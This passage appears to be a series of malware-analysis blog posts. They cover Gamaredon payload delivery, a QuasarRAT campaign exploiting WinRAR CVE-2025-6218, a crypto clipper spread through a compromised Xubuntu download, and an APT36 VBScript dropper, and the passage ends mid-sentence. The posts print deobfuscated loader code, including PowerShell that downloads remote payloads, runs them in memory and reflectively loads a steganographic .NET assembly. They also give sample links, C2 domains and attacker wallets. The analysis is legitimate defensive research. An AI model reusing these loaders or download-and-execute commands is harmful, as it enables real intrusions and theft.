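The processing steps can be approximated as follows. This is a sketch: the delimiter character is an assumption, and the final in-memory execution step is deliberately left out.

```python
import base64

def decode_stage(raw: bytes, delimiter: str = "#") -> bytes:
    # 1-4 of the steps above: UTF-8 conversion, cleanup of CR/LF and
    # delimiter characters, then Base64 decoding. Step 5 (execution)
    # is intentionally omitted.
    text = raw.decode("utf-8", errors="ignore")
    cleaned = text.replace("\r", "").replace("\n", "").replace(delimiter, "")
    return base64.b64decode(cleaned)
```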


Evasion Techniques

  • Multi-stage fallback logic
  • Dynamic hosts
  • Delays between requests
  • Victim-specific User-Agent

Below is an example of a fully constructed request header sent to the payload delivery host.


Payload Rotation

Gamaredon currently rotates payloads every 1-3 hours.

With each rotation, the following variables may change:

  • Domains for Payload Delivery
  • User-Agent
  • Cookie
  • Content-Length

Why Is Content-Length Set?

The Content-Length HTTP header specifies the size of the request or response body in bytes.
Its typical purpose is:

  • Defining message boundaries
  • Preventing truncated reads
  • Enabling correct stream handling

In this case, however, I strongly believe the header is set intentionally for tracking and proxy evasion.

Why?

The loader uses msxml2.xmlhttp.
When calling .send() via this client, the Content-Length header is not overwritten.

For a normal residential client, this is usually not an issue.
However, many HTTP/HTTPS proxies, especially residential and chained proxies, fail to handle this properly and may:

  • break the connection
  • modify the request
  • normalize headers

This behavior is highly detectable.

My conclusion:
Gamaredon likely uses this mechanism to filter out proxy-based analysis setups.
The choice of client and header behavior is far too specific to be accidental.

So, if you end up receiving GamaWiper instead of a payload, now you know why.


Conclusion

Gamaredon has clearly tightened its operational security.

The infrastructure flaws that previously allowed easy extraction of internal details have been addressed, and sandbox detection has shifted from “leaky but useful” to “wipe and move on”.

While these changes will certainly disrupt some tracking and automated analysis systems, the overall approach feels… let’s say pragmatic, but somewhat heavy-handed.

Effective?
Yes.

Elegant?
Debatable 😄


QuasarRAT Malware Campaign using CVE-2025-6218


I am currently analyzing the recent surge of malware samples exploiting the WinRAR vulnerability CVE-2025-6218. During this research, I found a new sample on abuse.ch which appears to be part of a small QuasarRAT malware campaign.

What is CVE-2025-6218? (Short summary for this analysis)

This vulnerability enables:

  • Remote Code Execution (RCE)
  • Manipulated NTFS Alternate Data Streams (ADS)
  • Hidden paths / directory traversal / tampered extraction metadata

The exploit relies on:

  • Specially crafted file headers
  • Unexpected or malformed filename fields in the RAR block
  • ADS payloads such as file.txt:evil.exe embedded inside the RAR structure
  • WinRAR linking the ADS → extracting it → and executing the resulting file automatically

The SHA256 hash of the file is:

c67cc833d079aa60d662e2d5005b64340bb32f3b2f7d26e901ac0b1b33492f2f
You can download the file here.

After extracting the outer archive, we obtain another RAR file. Before unpacking it, we take a look at its contents in the hex view to check for anything suspicious.

xxd c67cc833d079aa60d662e2d5005b64340bb32f3b2f7d26e901ac0b1b33492f2f.rar | less

We can already see the suspicious ADS payload inside the RAR block.
With this confirmation, we proceed to extract the archive using 7-Zip.

After extraction, we obtain two files:

Coinme.py.txt
'Coinme.py.txt:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_0fyhds341.vbs'

The file Coinme.py.txt contains a simple Python script that queries email addresses of coinme.com users.
You can find the script here.

Now we get to the interesting part — the file:

Coinme.py.txt:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_0fyhds341.vbs

It contains a short Visual Basic script:

The script downloads an HTML Application (HTA) file from a GitHub repository.
At the time of writing, both the repository and the user account have already been deleted. However, I uploaded a backup of the user’s repositories here.

Here is a screenshot of the repository and the associated profile:

Interestingly, the account only follows one inactive user with the username “Levbohol / лев”:


Next, I inspected the verification.hta file that was downloaded from the repository.

The file contains a lightly obfuscated HTA script. I decoded the fromCharCode array into ASCII, resulting in the following code:

conhost.exe --headless cmd.exe /c powershell.exe -w h -ep bypass -c "
$t=Join-Path $env:TEMP 'svchost.bat'; 
Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/Proscaution32/tessttxd312/refs/heads/main/ilovelovelove.txt' -OutFile $t -UseBasicParsing;
if(Test-Path $t){
    & conhost.exe --headless cmd.exe /c $t
}"

The script downloads yet another file named ilovelovelove.txt and executes it.
Let’s take a closer look at that text file.

We are now looking at a heavily obfuscated DOS batch file. The first things that stand out are numerous variable assignments using set ... and comments prefixed with the REM keyword.

The comments are merely junk intended to distract the analyst.
The variable assignments, however, are more complicated.

Some of the variables are never used anywhere in the script; these are clearly junk statements meant to confuse the reader.
Other variables are used during execution and must be isolated and replaced with their actual runtime values.
We also encounter various uninitialized variables, which are also junk, since they never carry a value.

Before proceeding, I remove all comments from the file.

sed -i '/^[Rr][Ee][Mm]/d' ilovelovelove.txt 

Next, I isolate all variables that can be identified as junk, meaning variables that are referenced but never assigned a value.

grep -oE '%[^%]+%' ilovelovelove.txt > isolated_set_commands.txt
while read -r line; 
  do x=$(echo "$line" | sed 's/%//g'); res="$(grep $x ilovelovelove.txt | wc -l)"
  if [ $res -lt 2 ]; 
    then echo "$line"; 
  fi
done < isolated_set_commands.txt >> removable.txt
rm isolated_set_commands.txt

I then remove all uninitialized variables from the script completely.

while read -r line; do sed -i "s|$line||g" ilovelovelove.txt; done < removable.txt 

The script is now much cleaner, but some junk variables still remain. These were not properly filtered out because they were detected as variable placeholders inside strings.
To handle this, we isolate them and remove any variable that does not have a corresponding set assignment.

I also found many Base64 strings in the script, but none of them appear to form recognizable structures at this point, so we ignore them for now.
Next, we replace every remaining variable with its assigned value.

For this purpose, I wrote a small helper script:

#!/bin/bash
grep -oE '%[^%]+%' ilovelovelove_copy.txt > usable.txt

while read -r line; do 
    fstr="$(echo $line | sed 's/%//g')"
    x=$(grep "set $fstr" ilovelovelove_copy.txt | wc -l)


    if [ $x -lt 1 ]; then
        sed -i "s|$line||g" ilovelovelove_copy.txt 
        continue
    fi

    value=$(grep "set $fstr" ilovelovelove_copy.txt | cut -d'=' -f2 )
    echo "$line $value"
    clean_line=$(echo -n "$line")
    clean_value=$(echo -n "$value")
    sed -i "s|$clean_line|$clean_value|g" ilovelovelove_copy.txt
done < usable.txt

After running the helper script, the cleaned batch script now looks like this:

After removing all ^M carriage returns, we obtain the following finalized version:

>> Click to open script <<

start conhost.exe --headless powershell.exe -ep bypass -w h -NoExit -c "
$Ab1CdE t-CimInstance -Namespace 'rootSecurityCenter2' -ClassName AntiVirusProduct -ErrorAction SilentlyContinue;
$fGh2IjK $false;

if ($Ab1CdE) {
    foreach ($Lm3NoP in $Ab1CdE) {
        $Qr4StU $Lm3NoP.displayName;

        if ($Qr4StU -like '*ESET Security*') {
            $Vw5XyZ 'https://files.catbox.moe/4q6yuz.txt';
            $Ab6CdE-Object System.Net.WebClient;;
            $Ab6CdE.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');;
            $Ef7GhI b6CdE.DownloadString($Vw5XyZ);;
            $Ab6CdE.Dispose();;

            $u  ('From'+'Base64'+'String');
            $Ij8KlM System.Convert].GetMethod($u).Invoke($null, @([string]$Ef7GhI));
            $No9PqR System.Text.Encoding]::UTF8.GetString($Ij8KlM);

            Invoke-Expression $No9PqR;
            $fGh2IjK rue;
            break;
        };

        if ($Qr4StU -like '*Malwarebytes*' -or $Qr4StU -like '*F-Secure*') {
            $St0UvW https://files.catbox.moe/qt6070.txt';
            $Xy1ZaB ew-Object System.Net.WebClient;;
            $Xy1ZaB.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');;
            $Cd2EfG $Xy1ZaB.DownloadString($St0UvW);;
            $Xy1ZaB.Dispose();;

            $u  'From'+'Base64'+'String');
            $Gh3IjK  [System.Convert].GetMethod($u).Invoke($null, @([string]$Cd2EfG));
            $Lm4NoP  [System.Text.Encoding]::UTF8.GetString($Gh3IjK);

            Invoke-Expression $Lm4NoP;
            $fGh2IjK $true;
            break;
        };
    };
};

Add-Type -AssemblyName System.Drawing, System.IO.Compression.FileSystem;;

$Qr5StU 'https://i.ibb.co.com/NfC1jKn/yu42mu5xn.png';;
$Vw6XyZ-Object System.Net.WebClient;;
$Vw6XyZ.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');;

$Ab7CdE $Vw6XyZ.DownloadData($Qr5StU);;
$Vw6XyZ.Dispose();;

$Ef8GhI w-Object IO.MemoryStream(,$Ab7CdE);;
$Ij9KlM stem.Drawing.Bitmap]::FromStream($Ef8GhI);;

$No0PqR $Ij9KlM.GetPixel(0,0);;
$St1UvW $Ij9KlM.GetPixel(1,0);;

$size uint32]$No0PqR.R -shl 24) -bor ([uint32]$No0PqR.G -shl 16) -bor ([uint32]$No0PqR.B -shl 8) -bor [uint32]$St1UvW.R;

$Xy2ZaB w-Object System.Collections.Generic.List[byte];

for ($y; $y -lt $Ij9KlM.Height; $y++) {
    for ($x; $x -lt $Ij9KlM.Width; $x++) {
        if ( ($x -eq 0 -and $y -eq 0) -or ($x -eq 1 -and $y -eq 0) ) {
            continue;
        };

        $p 9KlM.GetPixel($x,$y);;

        $Xy2ZaB.Add($p.R);;
        $Xy2ZaB.Add($p.G);;
        $Xy2ZaB.Add($p.B);;
    };
};

$Ij9KlM.Dispose();;
$Ef8GhI.Dispose();;

$Cd3EfG $Xy2ZaB.ToArray()[0..($size-1)];;

$Gh4IjK w-Object IO.MemoryStream(,$Cd3EfG);;
$Lm5NoP w-Object IO.MemoryStream;;

$Qr6StU w-Object IO.Compression.GZipStream($Gh4IjK, );;
$Qr6StU.CopyTo($Lm5NoP);;

$Qr%MknH%.Dispose();;
$Gh4IjK.Dispose();;

$Vw7XyZ $Lm5NoP.ToArray();;
$Lm5NoP.Dispose();;

foreach ($Ab8CdE in [AppDomain]::CurrentDomain.GetAssemblies()) {
    if ($Ab8CdE.GlobalAssemblyCache -and $Ab8CdE.Location.Contains('mscor'+'lib.dll')) {
        foreach ($Ef9GhI in $Ab8CdE.GetType(('System.Reflection.Assembly')).GetMethods('Public,Static')) {
            if ($Ef9GhI.ToString()[37] -eq ']') {
                $Ij0KlM 9GhI.Invoke($null,(,$Vw7XyZ));;

                $No1PqR $Ij0KlM.EntryPoint;;
                $St2UvW $No1PqR.GetParameters().Count;;

                if ($St2UvW -eq 0) {
                    $No1PqR.Invoke($null,$null);
                } else {
                    $No1PqR.Invoke($null,(,@()));
                };

                break;
            };
        };

        break;
    };
}
"

Analysis – What does the script actually do?


1. Detection of installed antivirus products

The script queries root\SecurityCenter2 via WMI to identify installed antivirus solutions.
Depending on the detected product, it downloads different Base64-encoded payloads, decodes them, and executes them in memory using Invoke-Expression.

2. Downloading a hidden payload from a PNG file

Regardless of the antivirus result, the script then downloads a PNG image from a remote URL.
This PNG contains embedded binary data stored inside pixel values (steganography).

The script:

  • reads each pixel,
  • reconstructs byte arrays from RGB values,
  • uses two pixels as payload length markers,
  • extracts the payload portion,
  • decompresses it via GZIP.

The result is a .NET assembly (DLL) extracted directly into memory.
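The length-marker step (two pixels encoding a 32-bit payload size) mirrors the shift-and-or logic visible in the deobfuscated PowerShell and can be reproduced like this:

```python
def payload_length(pixel0, pixel1):
    # Pixel (0,0) supplies the top three bytes (R, G, B) and pixel
    # (1,0)'s red channel supplies the low byte, matching the
    # PowerShell reconstruction:
    #   (R0 << 24) | (G0 << 16) | (B0 << 8) | R1
    r0, g0, b0 = pixel0[:3]
    r1 = pixel1[0]
    return (r0 << 24) | (g0 << 16) | (b0 << 8) | r1
```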

3. Reflective loading of the DLL

The DLL is never written to disk. Instead, it is:

  • loaded directly into memory,
  • executed via .NET reflection,
  • its entry point is invoked (with or without parameters).

This technique avoids leaving artifacts on disk and bypasses many detection mechanisms.

4. Execution of the final malware payload

The final payload, typically a stealer or remote-control module, runs fully in memory.

The PNG image

The PNG image looks like this:

(For security reasons, a watermark is embedded in the displayed version. You can download the original PNG here.)

To extract the payload from the image, we can use a small Python script (included in the GitHub repository).
This produces a file called stage2_payload.bin with the SHA256 hash d6775da94945ff5cbd26a1711f69cecdce981386983d2f504914630639563c36.

A quick VirusTotal scan provides additional details:

VirusTotal classifies the malware as Zusy (also known as Barys).
Zusy is an older but still active family of Windows malware. It has appeared for many years in small-scale campaigns and is typically used to steal credentials, browser information, or banking data. It is written in native C/C++; to confirm this, I’ll take a look into the file with Ghidra.


When analyzing a binary in Ghidra, the presence of functions named .ctor or .cctor is a strong indicator that the file contains .NET managed code. These method names come directly from the Common Language Runtime (CLR) and follow the naming conventions defined by the ECMA-335 Common Language Infrastructure (CLI) specification.

This indicates that we are not dealing with a typical Zusy malware sample, as Zusy does not use .NET managed code in any part of its execution chain.


I also uploaded the file to abuse.ch, where it was classified as “QuasarRAT”. This classification makes sense, as QuasarRAT is a remote access trojan written entirely in .NET.

QuasarRAT is a well-known open-source Windows remote access tool that has been abused by cybercriminals for years. It provides features such as keylogging, credential theft, file management, remote command execution, and real-time system monitoring. Because it is written in .NET, it is frequently modified, repacked, or extended by threat actors, making it easy to customize and embed into multi-stage loaders.

It is also interesting to examine the domains contacted by the malware.

The malware first retrieves the host’s public IP address using ipwho.is, and then contacts its command-and-control (C2) server hosted on the domain:

ihatefaggots.cc

This should be considered as an additional IOC.

Analyzing Malware distributed by Xubuntu.org

Yesterday I discovered a malware incident that was distributed via the official Xubuntu website.
There is already a Reddit post that largely corroborates the incident.



Today I’m going to take a closer look at that malware sample.
SHA256: ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826.
The sample I analyzed is available on abuse.ch

(Tip for readers: always verify hashes from a trusted source before interacting with a sample.)

After downloading the sample I inspected its file metadata. This sample is not a native Win32 executable with x86 code; it is a .NET assembly. You can usually spot that with the file utility or by looking for the CLR header (IMAGE_COR20) in the PE.

PE32 executable for MS Windows (GUI), Intel i386 Mono/.Net assembly

Concretely: the PE contains managed CIL/IL (Intermediate Language) and only a tiny native stub whose entry point calls _CorExeMain() (from mscoree.dll) to bootstrap the CLR. That means tools like Ghidra will show only a stub at the PE entry (the real logic lives in CLR metadata streams such as #~, #Strings and #Blob) and will not produce decompiled C# by default.

This pattern is typical for C#-based loader/dropper families. They often present a legitimate UI (in this case “SafeDownloader”) but hide malicious actions such as:

  • anti-VM / anti-debug checks
  • writing/extracting an encrypted payload to disk
  • creating persistence via registry autostart entries

For analysis I use ILSpy to decompile the managed code; Ghidra only shows the PE boot stub, while the real logic lives in the managed metadata and IL.

I decompiled the sample using ILSpy (CLI) with:

~/.dotnet/tools/ilspycmd -o ./decomp_output ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826.exe

Result:

ec3a45882d8734fcff4a0b8654d702c6de8834b6532b821c083c1591a0217826.decompiled.cs

After decompilation we get the decompiled C# files; the code I used for analysis is available on my GitHub.

The program is a WPF GUI wrapper (SafeDownloader) that social-engineers the user by showing Ubuntu/Xubuntu ISO links. When the user clicks Generate, the app calls an internal routine (named W.UnPRslEqVw() in the decompiled code) that is the real malware routine executed in the background.


Malware behavior (detailed)


Anti-analysis & sandbox evasion.

The loader first performs anti-analysis checks:

  • Debugger detection: Debugger.IsAttached and native IsDebuggerPresent() via kernel32.
  • Virtualization detection: uses WMI (ManagementObjectSearcher) to query system manufacturer/model and looks for keywords such as VMware, VirtualBox, QEMU, Parallels, Microsoft Corporation (common in VM images).

If any probe indicates a debug/VM environment, the program calls Environment.Exit(0) and quits, preventing payload execution in sandboxes.
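The keyword matching itself is simple; a Python stand-in for the WMI-based check (the function name and exact matching rules are my assumptions, the marker list comes from the decompiled code) looks like:

```python
# Keywords the loader searches for in the WMI manufacturer/model strings
VM_MARKERS = ["VMware", "VirtualBox", "QEMU", "Parallels", "Microsoft Corporation"]

def looks_virtualized(manufacturer: str, model: str) -> bool:
    # Case-insensitive substring match against the combined fields;
    # a hit causes the real loader to exit before dropping anything.
    text = f"{manufacturer} {model}".lower()
    return any(marker.lower() in text for marker in VM_MARKERS)
```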


API patching / self-modification

Self-modification / in-memory API patching:

The code modifies bytes in loaded system libraries (e.g. kernel32.dll and ntdll.dll). One patch replaces instructions with 0xC3 (a RET) to neuter functions (for example to alter the behavior of Sleep/delay functions used by sandboxes).
Another patch writes attacker-supplied bytes (XOR-decrypted) into memory.

This is effectively inline hooking / API patching and can alter the behavior of timing/registry functions or attempt to disable runtime hooks that monitoring software or AV products use.


Dropper

The loader drops a second-stage executable:

CreateDirectoryNative(text2);
WriteFileNative(text3, data);
MoveFileNative(text3, text4);
SetAttributesNative(..., attributes);
  • creates a folder under %APPDATA% (via Environment.SpecialFolder.ApplicationData),
  • writes a Base64-encoded blob (then XOR-decoded with key 0xF7) into a .tmp file,
  • renames the .tmp to .exe, and sets file attributes (hidden/system) via native calls.

These helpers correspond to CreateDirectory, CreateFile/WriteFile, MoveFile, and attribute-setting wrappers in the code.


Registry persistence

SetRegistryPersistence(text4, regPath);

The sample writes an autostart entry into the registry using low-level APIs (NtSetValueKey from ntdll and RegOpenKeyEx from advapi32) to store a randomly generated value name with the path to the dropped EXE. Because it writes directly via native system calls (instead of higher-level wrappers), this may be an attempt to confuse or bypass some detection mechanisms that watch common API usage.


Execution & single-instance check

Before launching the dropped executable the loader checks whether a process with the same name is already running. If it is not, the loader starts the dropped binary; this avoids multiple simultaneous instances.


UI deception

The WPF UI displays legitimate Ubuntu download links to build trust. The user sees nothing suspicious while the loader writes the payload to disk, establishes persistence, and executes the dropped binary in the background.


Extracting and decoding the dropped payload

As we can see here, there is another Base64-encoded and XOR-obfuscated payload (XOR key = 247 / 0xF7) stored in the variable data:

I exported the Base64 blob to dropper_isolated.b64 and decoded + XOR-decoded it with:

python3 -c 'import base64; import sys; data = base64.b64decode(open("dropper_isolated.b64").read()); data = bytes([b ^ 0xF7 for b in data]); open("payload.bin","wb").write(data)'

The resulting payload.bin is a native PE executable (x86 machine code), not a .NET assembly.

I uploaded that binary to VirusTotal for a quick scan:

VirusTotal flags the payload as malicious and indicates that it is a cryptocurrency clipper, malware that monitors the Windows clipboard for crypto wallet addresses and replaces them with attacker-owned addresses so funds are redirected to the attacker’s wallet. With this classification we can pivot to a deeper static analysis (I used Ghidra for the native PE).

The native binary is small and relatively easy to analyze:

A quick strings scan shows clipboard-related APIs (OpenClipboard, GetClipboardData, SetClipboardData), a strong indicator of clipper behavior.
I navigated to the function that implements these calls (named FUN_1400016b0 in my Ghidra session).


Clipboard routine overview.
The function reads the Windows clipboard:

  • opens the clipboard and calls GetClipboardData(CF_TEXT),
  • validates that the clipboard bytes are text and contain only characters typical for wallet addresses (alphanumeric, : or _)
  • then performs prefix checks to identify the coin type.

Prefix checks & coin type mapping.
The malware performs a series of prefix checks to detect the wallet type. From the decompiled logic the mapping is:

Bitcoin:
(*pcVar4 - 0x31U & 0xfd) == 0 or strncmp(pcVar4, &DAT_140004034, 3) (matches the "1" / "3" prefixes)

Litecoin:
strncmp(pcVar4, &DAT_14000402c, 4) or (*pcVar4 + 0xb4U) < 2

ETH:
strncmp(pcVar4, &DAT_140004028, 2) → "0x"

DOGE:
cVar1 == 'D'

TRON:
cVar1 == 'T'

XRP:
cVar1 == 'r'

Where to find the addresses:

For each coin type the malware assembles the attacker’s address from two parts:

  • several 32-bit constants (_DAT_140004100, _DAT_140004104, …)
    eight 4-byte words = 32 ASCII characters (little-endian dword representation)
  • a short tail derived by XOR-ing bytes taken from another data blob (e.g. DAT_1400031c0) with 0x15
    The tail length varies (commonly 2–10 bytes depending on coin), and it completes the address (including checksum)


You can verify a single dword with Python:

python3 -c "import struct; print(struct.pack('<I', 0x71316362).decode('ascii'))"

The result:

bc1q

So the first dword decodes to bc1q, the signature prefix of a Bech32 Bitcoin address.

This is how I built the tail by merging the byte chunks:

The 32-character string obtained from the dwords is only the first part. The function then computes additional tail bytes by XOR-ing bytes from a separate data region (e.g. DAT_1400031c0) with 0x15 and appends them.
Those tail bytes complete the address (including checksum).
If you only decode the dwords, the address will fail checksum validation; you must XOR-decode and append the tail bytes to get a valid address.


Full address assembly (summary)
The malware writes eight 32-bit constants (32 ASCII chars) and then fills a small tail array with bytes computed as DAT_src[i] ^ 0x15 (tail length varies). The full address is dword_ascii + xor_tail.
It then GlobalAllocs a clipboard buffer and calls SetClipboardData(CF_TEXT, ...) to replace the clipboard contents.
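The assembly logic can be verified in Python using only values quoted in this article (the first dword 0x71316362 and the XOR key 0x15); the helper name is mine:

```python
import struct

def assemble_address(dwords, tail_src, key=0x15):
    # Eight little-endian dwords decode to up to 32 ASCII characters;
    # the tail bytes are XOR-decoded with the embedded key and appended
    # to complete the address (including its checksum portion).
    head = b"".join(struct.pack("<I", d) for d in dwords).decode("ascii")
    tail = bytes(b ^ key for b in tail_src).decode("ascii")
    return head + tail
```

With only the first dword this yields the "bc1q" Bech32 prefix followed by the decoded tail; feeding in all eight dwords reconstructs the full attacker address.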



To recover the tail bytes:

dump the bytes at the VA (e.g. 0x1400031c0) with a binary tool (I used radare2; you can also use Ghidra or xxd), for example:

76 78 25 2D 60 64 7D 23 25 63 

XOR each raw byte with 0x15 (the deobfuscation key embedded in the code). You can do this in CyberChef: From Hex -> XOR (key: 15 hex) -> To String.

Output:

cm08uqh60v
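The same XOR step can be scripted instead of using CyberChef:

```python
# Raw tail bytes dumped at DAT_1400031c0, XOR-decoded with the
# embedded key 0x15
raw = bytes.fromhex("76 78 25 2D 60 64 7D 23 25 63".replace(" ", ""))
tail = bytes(b ^ 0x15 for b in raw).decode("ascii")
print(tail)  # → cm08uqh60v
```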

Appending that to the 32-char dword string yields the full Bech32 address:

bc1qrzh7d0yy8c3arqxc23twkjujxxax + cm08uqh60v = bc1qrzh7d0yy8c3arqxc23twkjujxxaxcm08uqh60v

Extracted addresses:
I applied the same method to the other coin branches and extracted the following attacker addresses from the binary:

  • Bitcoin (Bech32): bc1qrzh7d0yy8c3arqxc23twkjujxxaxcm08uqh60v
  • Litecoin: LQ4B4aJqUH92BgtDseWxiCRn45Q8eHzTkH
  • Ethereum / BSC style (hex): 0x10A8B2e2790879FFCdE514DdE615b4732312252D
  • Dogecoin: DQzrwvUJTXBxAbYiynzACLntrY4i9mMs7D
  • Tron (TRX): TW93HYbyptRYsXj1rkHWyVUpps2anK12hg
  • XRP (Ripple): r9vQFVwRxSkpFavwA9HefPFkWaWBQxy4pU
  • Cardano: addr1q9atfml5cew4hx0z09xu7mj7fazv445z4xyr5gtqh6c9p4r6knhlf3jatwv7y72deah9un6yettg92vg8gskp04s2r2qren6tw

These are the final wallet addresses embedded in this sample (per the static reconstruction). I didn’t find any additional interesting functionality in the binary beyond the dropper/clipper behavior.


TL;DR

I found a C# WPF loader distributed via an Xubuntu download page that drops a native clipper payload.
The loader includes anti-VM and anti-debug checks, in-memory API patching, drops and runs a second-stage PE, and the second stage is a clipboard clipper that replaces wallet addresses with attacker-owned addresses.
I statically reconstructed the attacker wallets from embedded dwords + XOR tails and found several addresses for BTC, LTC, ETH, DOGE, TRX, XRP and Cardano. No transactions were observed at the time of analysis.


A short critique: why the threat actor did a surprisingly poor job despite compromising xubuntu.org

It’s striking how many basic operational security and quality of work mistakes this actor made, mistakes that turned what could have been a high-impact supply-chain compromise into a relatively easy forensic win for analysts.

Concrete failures observed

  • Amateur packaging: shipping a ZIP that claims to contain a torrent but actually contains an .exe and a tos.txt is a glaring red flag. That mismatched user experience (and the presence of an executable in a “torrent” download) makes the payload obvious to even casual users and automated scanners.
  • Sloppy metadata: the tos.txt claims “© 2026 Xubuntu.org” while it’s 2025. Small details like anachronistic timestamps or incorrect copyright years are low-effort giveaways that something is off.
  • Poor obfuscation / easy static recovery: the attacker embedded wallet strings as readable dwords plus simple XOR tails. Those artifacts were trivially reconstructable with basic tooling (radare2/CyberChef/Python). Even the XOR keys were visible in the decompiled code. That means the malicious addresses, the primary goal of the clipper, were recoverable without dynamic execution.
  • Malformed or inconsistent artifacts: some extracted addresses failed checksum validation (or appeared intentionally malformed). That suggests rushed assembly, faulty encoding, or placeholders left in, again lowering the bar for detection and denying the attacker guaranteed success.
  • Over-reliance on a single trick: using a compromised site to host a ZIP is effective in general, but the actor did not sufficiently hide operational traces nor build fallback delivery strategies. When defenders inspected the file, the entire chain unraveled quickly.

Why these mistakes matter

  • They reduced the attacker’s window of opportunity. Instead of a stealthy supply-chain drop that could reap long-lived infections, the compromise was noisy and trivially triaged.
  • They made attribution and indicator extraction easy: embedded addresses, simple XOR keys, and clear code paths gave analysts immediate IoCs (wallets, hashes, strings).
  • They increased the chances of swift remediation by the vendor and faster takedown by infrastructure providers.

Final thought
The actor clearly reached a valuable target, the official download infrastructure, but their execution quality was low. That combination (high opportunity + poor tradecraft) is exactly what defenders want: an incident with high signal and relatively low analytical cost. The silver lining here is that sloppy attackers give security teams the evidence they need to respond quickly and to harden distribution chains for the future.

APT36 – “Abaris”: Deobfuscating a VB Dropper


I recently discovered a sample attributed to the threat actor APT36 (“Transparent Tribe”) on MalwareBazaar.
APT36 (aka Transparent Tribe) is a Pakistan-aligned cyber-espionage group that has been active since at least 2013 and is primarily focused on intelligence collection against targets in South Asia (government, military, diplomatic, and research organizations in India and Afghanistan).
The group is known for tailored phishing campaigns and diverse staging techniques (weaponized documents, malicious installers, and platform-specific lures), and has a history of delivering custom backdoors and RAT families such as variants of Crimson/Eliza-style malware.
Recently observed activity shows the actor expanding its toolset and delivery methods (including Linux desktop lures and cloud-hosted payloads), which underlines the need to treat seemingly innocuous artifacts (obfuscated scripts, shortcut files, or odd AppData/Temp files) as potentially dangerous.


The sample turned out to be a heavily obfuscated VBScript. In this post I will walk through the manual deobfuscation steps I performed.
The SHA256 hash of the file is “d35f88dce5dcd7a1a10c05c2feba1cf478bdb8a65144f788112542949c36dd87”

I first uploaded the file to VirusTotal. It was first submitted yesterday (18 October 2025).
Some AV systems already detect the file as malicious.

(note: I call this sample “Abaris” because the dropper decodes part of its payload and writes it into a file named Abaris.txt, which is later used for execution.)

If you want to download the sample or my cleaned copy, you can find them here: https://github.com/Mr128Bit/apt-malware-samples/tree/main/Pakistan/APT36/Abaris

Original filename: Pak_Afghan_War_Impact_on_Northern_Border_India.vbs. I made a copy and renamed it to ap3.vbs for analysis.

When opening the file, you immediately notice a lot of Danish-looking comments/words scattered through the source. These are pure noise; they exist to hinder analysis and evade signature detection. But underneath the noise we can still find Visual Basic constructs that we want to extract.


We can filter out those comment lines very easily.

grep -v "^'" ap3.vbs | sed '/^[[:space:]]*$/d' > ap3_clean.vbs

The output looks much cleaner now, clear VB structures are visible, although the script remains heavily obfuscated.

The next step is to remove additional noise by deleting variables or code blocks that are only used in initialization and never referenced later.

After cleanup, the following code remains:

This is already much tidier. We identified three functions of interest: Crocodilite, Subskribenten, and Cashoo. They are small and not deeply obfuscated, so we can determine their purpose fairly quickly. It’s often useful at this stage to rename obfuscated variables and functions to meaningful names.

Crocodilite

This function creates a text file and writes the passed string into it. In this sample it is used to write the content of the variable tendrilous into Abaris.txt.

' ORIGINAL
Sub Crocodilite(Tudemiklens, Fissuriform)

    Dim Sinh, Galactometer
    Set Sinh = CreateObject("Scripting.FileSystemObject")
    Set Galactometer = Sinh.CreateTextFile(Fissuriform, True)
    Galactometer.Write Tudemiklens
    Galactometer.Close

End Sub
' ADJUSTED
Sub write_to_file(text, path)
    Dim fileSysObj, file
    Set fileSysObj = CreateObject("Scripting.FileSystemObject")
    Set file = fileSysObj.CreateTextFile(path, True)
    file.Write text
    file.Close
End Sub

Subskribenten

This is a simple wrapper that executes a command via WScript.Shell. It’s used to invoke the payload that was written to disk.

' ORIGINAL
Set Plenicorn = CreateObject("WScript.Shell")
...
Function Subskribenten(Tautegorical)

    Call Plenicorn.Run(Tautegorical,0)

End Function

' ADJUSTED
Set shell = CreateObject("WScript.Shell")
...
Function Execute(payload)
    Call shell.Run(payload, 0)
End Function

Cashoo

A decoder routine. It extracts characters at fixed intervals from a masking string (i.e. it removes padding characters and reconstructs the hidden string). This is a classic technique to hide URLs, commands or other sensitive strings from static signature scanners.

' ORIGINAL
Function Cashoo(ByVal Microsphaeric)

    for i = 4 to len(Text) Step 4
    ' Mid(string, start, length) extract a specified amount of characters from a string
    Cashoo = Cashoo & Mid(Text,i,Alenlang) 

    Next


End Function

' ADJUSTED
Function ExtractEveryFourthChar(ByVal Text)

    Dim i
    For i = 4 To Len(Text) Step 4
        ' Mid(string, start, length) extracts characters from a string;
        ' here one character at every fourth position
        ExtractEveryFourthChar = ExtractEveryFourthChar & Mid(Text, i, 1)
    Next

End Function


I implemented a Python equivalent to decode the payload. After finishing the script, I fed several encoded strings from the VB file through it.
Additionally, I loaded every string assigned to the variable “tendrilous” into a separate file, “tendrilous.txt”, for decoding purposes.
You can view the script here.
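The core of that decoder boils down to a few lines. Here is a minimal sketch of the Cashoo logic in Python, assuming the slice length (Alenlang in the obfuscated source) is 1:

```python
def extract_every_fourth_char(text: str) -> str:
    # VBScript's Mid() is 1-indexed, so Mid(Text, i, 1) for i = 4, 8, 12, ...
    # maps to text[i - 1] in Python.
    return "".join(text[i - 1] for i in range(4, len(text) + 1, 4))
```

Running this over a padded string like "xxxAyyyByyyC" yields "ABC", which is exactly how the sample hides URLs and commands between junk characters.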

Result:

$Commonplacer=[char]34;
$Rasping=$env:tmp;
$Unbefringed=gc $Rasping\Abaris.txt -Delimiter $Commonplacer;
$Emydes=$Unbefringed.'substring'(4696-1,3);
.$Emydes $Unbefringed

The Python routine works as intended, and the decoded PowerShell stub is now readable: it reads Abaris.txt, extracts a three-character command name from a fixed offset, and invokes that command with the file content as its parameter, i.e. dynamic code execution.
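For illustration, the stub's substring arithmetic maps to Python like this (the offset comes from the stub; PowerShell's substring(start, length) is zero-indexed, hence the 4696-1):

```python
def extract_command(content: str, start: int = 4695, length: int = 3) -> str:
    # Pull a short command name (e.g. a three-letter alias) out of a
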